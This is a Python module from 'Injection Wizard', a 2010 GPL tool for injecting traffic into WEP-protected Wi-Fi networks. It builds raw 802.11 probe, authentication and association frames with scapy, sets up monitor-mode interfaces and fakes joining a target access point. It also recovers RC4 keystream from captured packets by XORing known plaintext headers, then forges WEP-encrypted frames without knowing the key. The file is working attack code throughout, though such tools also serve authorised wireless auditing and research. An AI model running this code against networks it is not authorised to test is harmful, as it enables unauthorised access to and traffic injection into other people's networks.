# -*- coding: UTF-8 -*-
# Injection Wizard 
# --An application for injecting traffic in WEP protected Wi-Fi networks--
# Version: 1.0
# Copyright (C) 2010 Fernando Pablo Romero Navarro <fernpromero@gmail.com>
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#

import os
import time
import array
import struct
import iwlibs

from Crypto.Cipher import ARC4
from scapy.packet import *
from scapy.utils import rdpcap
from scapy.layers.l2 import *
from scapy.layers.dot11 import *
from auxclass import PacketFinder
from sndrcvth import SendReceiveDot11
from filters import *


SLOT=20
SIFS=10
DIFS=SIFS+2*SLOT
ACK_TIME=192+14+SIFS


ARP_PAYLOAD=0
IP_PAYLOAD=1
LLC_HEADER="\xAA\xAA\x03\x00\x00\x00\x08"
ARP_PREFIX="\x00\x01\x08\x00\x06\x04\x00"
IPV4_PREFIX="\x45\x00"



class RespStatus:
    
    NO_RESPONSE=-1
    SUCCESS=0
    UNSPECIFIED=1
    
    RESERVED=2
    AUTH_REJECT=3
    ASSO_REJECT=4
    RESERVED2=9
    
    ASSO_CAP_NOT_SUPPORTED=10
    ASSO_DENIED=12
    AUTH_METHOD_NOT_SUPPORTED=13
    AUTH_OUT_OF_ORDER=14
    AUTH_CHLNG_FAIL=15
    AUTH_TIME_OUT=16
    ASSO_MAX_STA=17
    ASSO_RATE_NOT_SUPPORTED=18
    
    RESERVED3=19


def add_monitor_header(srvconf, dot11frame):    
    
    if(isinstance(dot11frame, Dot11)):
        head=srvconf.get_mon_head()
        if(head is None):
            return dot11frame
        else:
             return head/dot11frame
    else:
        return None

def build_rt_basic():
    
    rt=RadioTap()
    rt.version=0
    rt.pad=0
    rt.len=11
    rt.present='b15+b17'
    rt.notdecoded='\x00\x00\x00'

    return rt

def build_ack(destaddr):
    
    dot11=Dot11()
    dot11.proto=0
    dot11.type='Control'
    dot11.subtype=13
    dot11.FCfield=0
    dot11.ID=0
    dot11.SC=None
    dot11.addr1=destaddr
    dot11.addr2=None
    dot11.addr3=None
    dot11.addr4=None

    return dot11

def build_probe_req(srcaddr, bssid, ssid):
    
    dot11=Dot11()
    dot11.proto=0
    dot11.type='Management'
    dot11.subtype=4
    dot11.FCfield=0
    dot11.ID=0
    dot11.SC=0
    dot11.addr1='ff:ff:ff:ff:ff:ff'
    dot11.addr2=srcaddr
    dot11.addr3=bssid
    dot11.addr4=None

    ie1=Dot11Elt()
    ie1.ID='SSID'
    ie1.len=len(ssid)
    ie1.info=ssid

    ie2=Dot11Elt()
    ie2.ID='Rates'
    ie2.len=8
    ie2.info='\x02\x04\x0b\x16\x0c\x12\x18\x24'

    ie3=Dot11Elt()
    ie3.ID='ESRates'
    ie3.len=4
    ie3.info='\x30\x48\x60\x6c'

    
    pkt=dot11/Dot11ProbeReq()/ie1/ie2/ie3
    return pkt

def build_authen_client(srcaddr, bssid):
    
    dot11=Dot11()
    dot11.proto=0
    dot11.type='Management'
    dot11.subtype=11
    dot11.FCfield=0
    dot11.ID=ACK_TIME
    dot11.SC=0
    dot11.addr1=bssid
    dot11.addr2=srcaddr
    dot11.addr3=bssid
    dot11.addr4=None

    auth=Dot11Auth()
    auth.algo=0
    auth.seqnum=1
    auth.status=0

    return dot11/auth

def build_assoc_request(srcaddr, bssid, ssid, capblts):
        
    dot11=Dot11()
    dot11.proto=0
    dot11.type='Management'
    dot11.subtype=0
    dot11.FCfield=0
    dot11.ID=ACK_TIME
    dot11.SC=0
    dot11.addr1=bssid
    dot11.addr2=srcaddr
    dot11.addr3=bssid
    dot11.addr4=None

    asoc=Dot11AssoReq()
    asoc.cap=capblts
    asoc.listen_interval=1

    ie1=Dot11Elt()
    ie1.ID='SSID'
    ie1.len=len(ssid)
    ie1.info=ssid

    ie2=Dot11Elt()
    ie2.ID='Rates'
    ie2.len=8
    ie2.info='\x02\x04\x0b\x16\x0c\x12\x18\x24'

    ie3=Dot11Elt()
    ie3.ID='ESRates'
    ie3.len=4
    ie3.info='\x30\x48\x60\x6c'

    pkt=dot11/asoc/ie1/ie2/ie3

    return pkt

    
def build_null_data_to_ap(srcaddr, bssid):
    
    dot11=Dot11()
    dot11.proto=0
    dot11.type='Data'
    dot11.subtype=4
    dot11.FCfield='to-DS'
    dot11.ID=ACK_TIME
    dot11.SC=0
    dot11.addr1=bssid
    dot11.addr2=srcaddr
    dot11.addr3=bssid
    dot11.addr4=None

    return dot11

def build_Dot11WEP_frame(keyid, iv, keystr, pkt):
    
    ICVLENGTH=4
    data=str(pkt)

    if len(data)>len(keystr)-ICVLENGTH:
        return None
    else:
        crc=crc32(data)
        fmt=(crc<0 and "<i") or "<I"
        data=data+struct.pack(fmt, crc)
        ciphdata=array.array("B", data)
        for i in range(len(ciphdata)):
            ciphdata[i]=ciphdata[i] ^ ord(keystr[i])
        ciphdata=ciphdata.tostring()

        wep=Dot11WEP()
        wep.setfieldval('iv', iv)
        wep.setfieldval('keyid', keyid)
        wep.setfieldval('wepdata', ciphdata[:-4])
        fld=wep.get_field('icv')
        empty, value=fld.getfield(wep, ciphdata[-4:])
        wep.setfieldval('icv', value)

        return wep

    
def build_WEP_test_frame(keyid, iv, keystr, macaddr=None):
        
    macaddr=((macaddr is None) and '00:11:22:33:44:55') or macaddr
    data="\xaa\xaa\x03\x00\x00\x00\x08\x06"\
         "\x00\x01\x08\x00\x06\x04\x00\x01"+\
          mac2str(macaddr)+\
         "\xc0\xa8\x01\xAA"+\
         "\xff\xff\xff\xff\xff\xff"+\
         "\xc0\xa8\x01\x01"

    maxlng=len(data)+4
    if len(keystr) > maxlng:
        keystr=keystr[:maxlng]

    lng=len(keystr)-4
    crc=crc32(data[:lng])
    if crc<0:
        fmt="<i"
    else:
        fmt="<I"

    crcpacked=struct.pack(fmt, crc)
    ciphdata=array.array("B", keystr)

    for i in range(lng):
        ciphdata[i]=ciphdata[i] ^ ord(data[i])

    j=0
    for i in range(lng, len(keystr)):
        ciphdata[i]=ciphdata[i] ^ ord(crcpacked[j])
        j=j+1

    ciphdata=ciphdata.tostring()
    wep=Dot11WEP()
    wep.setfieldval('iv', iv)
    wep.setfieldval('keyid', keyid)
    wep.setfieldval('wepdata', ciphdata[:-4])
    fld=wep.get_field('icv')
    _, value=fld.getfield(wep, ciphdata[-4:])
    wep.setfieldval('icv', value)

    return wep


def check_WEP_ICV(wepkt, sk):
    
    if(wepkt.haslayer(Dot11WEP)):
        convspec=lambda x: (x<0 and "i") or "I"
        wep=wepkt.getlayer(Dot11WEP)
        iv=wep.getfieldval('iv')
        icv=wep.getfieldval('icv')
        wepdata=wep.getfieldval('wepdata')

        fmt="!%ds%1s" % (len(wepdata), convspec(icv))
        ciphertxt=struct.pack(fmt, wepdata, icv)
        rc4=ARC4.new(iv+sk)
        cleartxt=rc4.decrypt(ciphertxt)
        chksum=crc32(cleartxt[:-4])
        fmt="<%1s" % (convspec(chksum), )
        return cleartxt[-4:]==struct.pack(fmt, chksum)
    else:
        return False



def probe_AP(srvconf):
    
    ifmac=srvconf.get_if_MAC()
    apmac=srvconf.get_ap_MAC()
    ssid=srvconf.get_SSID()
    ifmon=srvconf.get_if_mon()    
    l2packet=srvconf.get_monitor_packet()
    timeout=srvconf.get_long_timeout()
    retries=srvconf.get_max_retries()

    
    lsf="link[0]=0x50"
    pktfilter=[lambda x: is_Probe_Response(x, ifmac)]    
    
    pkt=None
    sr=None
    probe=build_probe_req(ifmac, apmac, ssid)
    tmpack=build_ack(apmac)

    pkt=add_monitor_header(srvconf, probe)
    ack=add_monitor_header(srvconf, tmpack)
    
    sr=SendReceiveDot11(ifmon, l2packet, lsf)

    resp=sr.send_fa(pkt, pktfilter, timeout, retries, 1, None, 1, ack)
    sr.release()
    
    
    return len(resp)>0
    

def probe_association(srvconf):
    
    ifmac=srvconf.get_if_MAC()
    apmac=srvconf.get_ap_MAC()
    ifmon=srvconf.get_if_mon()
    l2packet=srvconf.get_monitor_packet()
    timeout=srvconf.get_long_timeout()
    retries=srvconf.get_max_retries()
    
    lsf="link[0]=0xD4 or link[0]=0xC0 or link[0]=0xA0"
    pktfilter=[lambda x: frame_to_station(x, ifmac)]*10
   
    pkt=None
    sr=None
    nulldata=build_null_data_to_ap(ifmac, apmac)
    pkt=add_monitor_header(srvconf, nulldata)

    sr=SendReceiveDot11(ifmon, l2packet, lsf)
    resp=sr.send_fa(pkt, pktfilter, timeout, retries, 1)
    sr.release()
    
    acked=False
    detached=False
    for frame in resp:
        if is_ACK(frame, ifmac):
            acked=True
        elif is_Deauthentication_from_AP(frame, ifmac, apmac):
            detached=True
        elif is_Disassociation_from_AP(frame, ifmac, apmac):
            detached=True
    
    if detached:
        return False
    elif acked:
        return True
    else:
        return None
    
    
def do_authentication(srvconf):
        
    ifmac=srvconf.get_if_MAC()
    apmac=srvconf.get_ap_MAC()
    ifmon=srvconf.get_if_mon()
    l2packet=srvconf.get_monitor_packet()
    timeout=srvconf.get_long_timeout()
    retries=srvconf.get_max_retries()

    lsf="link[0]=0xB0"
    pktfilter=[lambda x: is_OSA_Req(x, ifmac),
               lambda x: is_OSA_Resp(x, ifmac)]

    d11auth=build_authen_client(ifmac, apmac)
    tmpack=build_ack(apmac)
    pkt=add_monitor_header(srvconf, d11auth)
    ack=add_monitor_header(srvconf, tmpack)

    sr=SendReceiveDot11(ifmon, l2packet, lsf)
    resp=sr.send_fa(pkt, pktfilter, timeout, retries, 2, None, 2, ack, 8)
    sr.release()

    if len(resp)<2:
        return RespStatus.NO_RESPONSE
    else:
        pkt=resp[1]
        pkt.getlayer(Dot11Auth)
        st=pkt.getfieldval('status')
        if(st>=RespStatus.RESERVED3 or (st>=RespStatus.RESERVED
           and st<=RespStatus.RESERVED2)):
            return RespStatus.RESERVED
        else:
            return st



def do_association(srvconf):
    
    ifmac=srvconf.get_if_MAC()
    apmac=srvconf.get_ap_MAC()
    ssid=srvconf.get_SSID()
    ifmon=srvconf.get_if_mon()
    l2packet=srvconf.get_monitor_packet()
    timeout=srvconf.get_long_timeout()
    retries=srvconf.get_max_retries()

    
    lsf="link[0]=0x00 or link[0]=0x10"
    pktfilter=[lambda x: is_Assoc_Req(x, ifmac),
               lambda x: is_Assoc_Resp(x, ifmac)]

    caps='ESS+short-slot+short-preamble'
    d11assoc=build_assoc_request(ifmac, apmac, ssid, caps)
    tmpack=build_ack(apmac)
    pkt=add_monitor_header(srvconf, d11assoc)
    ack=add_monitor_header(srvconf, tmpack)

    sr=SendReceiveDot11(ifmon, l2packet, lsf)
    resp=sr.send_fa(pkt, pktfilter, timeout, retries, 2, None, 2, ack, 5)
    sr.release()

    if len(resp)<2:
        return RespStatus.NO_RESPONSE
    else:
        pkt=resp[1]
        pkt.getlayer(Dot11AssoResp)
        st=pkt.getfieldval('status')
        if(st>=RespStatus.RESERVED3 or (st>=RespStatus.RESERVED
           and st<=RespStatus.RESERVED2)):
            return RespStatus.RESERVED
        else:
            return st

def do_join(srvconf):    
    
    RETRIES=5
    SLEEP_TIME=0.2
    nret=RETRIES
    sc=RespStatus.NO_RESPONSE
    
    while nret>0 and sc==RespStatus.NO_RESPONSE:
        sc=do_authentication(srvconf)
        if sc==RespStatus.NO_RESPONSE:
            nret=nret-1
            time.sleep(SLEEP_TIME)

    if sc==RespStatus.SUCCESS:
        nret=RETRIES
        sc=RespStatus.NO_RESPONSE

        while nret>0 and sc==RespStatus.NO_RESPONSE:
            sc=do_association(srvconf)
            if sc==RespStatus.NO_RESPONSE:
                nret=nret-1
                time.sleep(SLEEP_TIME)

        if sc==RespStatus.SUCCESS:
            return RespStatus.SUCCESS
        else:
            return RespStatus.ASSO_REJECT
        
    elif sc==RespStatus.NO_RESPONSE:
            return RespStatus.NO_RESPONSE
    else:
        return RespStatus.AUTH_REJECT


def create_mon_iface(mngiface, moncount):
   
    command="iw dev %s interface add mon%d type monitor" \
             % (mngiface, moncount)

    retcode=os.system(command)
    return retcode


def enable_mon_iface(iflist, mngiface):
    
    err=-4
    moniface=None
    ifcount=1

    try:
        cliface=iwlibs.Wireless(mngiface)
        mac=cliface.getHWAddress()[1]        
        cliface.set_enable(True)        
        cliface.release()
        err=-3

        moniface=iflist.get_iface_by_address(mac, "Monitor", ifcount)        
        if moniface is None:    
            count=0             
            moniface="mon"+str(count)
            monlist=iflist.list_ifaces("Monitor")
            while moniface in monlist:
                count=count+1
                moniface="mon"+str(count)

            err=-2
            sc=create_mon_iface(mngiface, count)
            if sc!=0:
                raise EnvironmentError
            else:
                iflist.add_iface(moniface, mac, "Monitor")

        err=-1
        enabled=False
        tmpiface=None
        while moniface is not None and not enabled:
            try:
                tmpiface=iwlibs.Wireless(moniface)
                tmpiface.set_enable(True)
                tmpiface.set_address('169.255.255.254')
                tmpiface.release()
                enabled=True
            except EnvironmentError:
                ifcount=ifcount+1
                moniface=iflist.get_iface_by_address(mac, "Monitor", ifcount)


        if enabled:
            err=0

    except Exception:
        pass
    finally:
        return (err, moniface, mac)

def set_monitor_channel(moniface, chan):
        
    iface=iwlibs.Wireless(moniface)    
    iface.set_enable(False)
    time.sleep(0.4)
    iface.setBitrate(1)
    time.sleep(0.1)
    iface.setChannel(chan)
    time.sleep(0.4)
    iface.set_enable(True)

def guess_monitor_header_type(ifname):
        
    iface=iwlibs.Wireless(ifname)
    linktype=iface.getHWAddress()[0]

    if linktype==0x69 or linktype==0x321:
        return 0        
    elif linktype==0x7F or linktype==0x323:
        return 1        
    else:
        return None

def discover_essid(srvconf, bssid, cancelmon):
   
   
    lsf="link[0]==0x50 or link[0]==0x00"
    pktfilt=[lambda x: is_Probe_Response_from_AP(x, bssid),
             lambda x: is_Assoc_Req_to_AP(x, bssid)]
    timeout=1.0

    # @type srvconf ServerConf
    pf=PacketFinder(srvconf, lsf, pktfilt, timeout)
    found=False
    pkt=None
    ie=None
    prev=None
    id=None

    # @type cancelmon CancelMonitor
    while not cancelmon.is_cancelled() and not found:
            pkt=pf.find()
            if pkt is None:
                pass
            else:
                ie=pkt.getlayer(Dot11Elt)
                while isinstance(ie, Dot11Elt) and id!=0:
                    id=ie.getfieldval("ID")
                    prev=ie
                    ie=ie.payload

                if id==0:
                    found=True

    pf.release()
    if(found):
        return prev.getfieldval("info")
    else:
        return None

def extract_init_ks(wepkt):
    
    # @type wepkt Dot11WEP
    ciphdata=wepkt.getfieldval('wepdata')
    datalen=len(ciphdata)
    cleardata=array.array("B", LLC_HEADER)
    ARP_THRESHOLD=40
    
    if datalen < ARP_THRESHOLD:
        cleardata.append(6)
        cleardata.extend(map(ord, ARP_PREFIX))
    else:
        cleardata.append(0)
        cleardata.extend(map(ord, IPV4_PREFIX))
        cleardata.extend(map(ord, struct.pack("!H", datalen-8)))

    
    if datalen<len(cleardata):
        cleardata=cleardata[:datalen]

    ks=array.array("B", cleardata)

    for i in range(len(cleardata)):
        ks[i]= cleardata[i] ^ ord(ciphdata[i])

    return ks.tostring()
        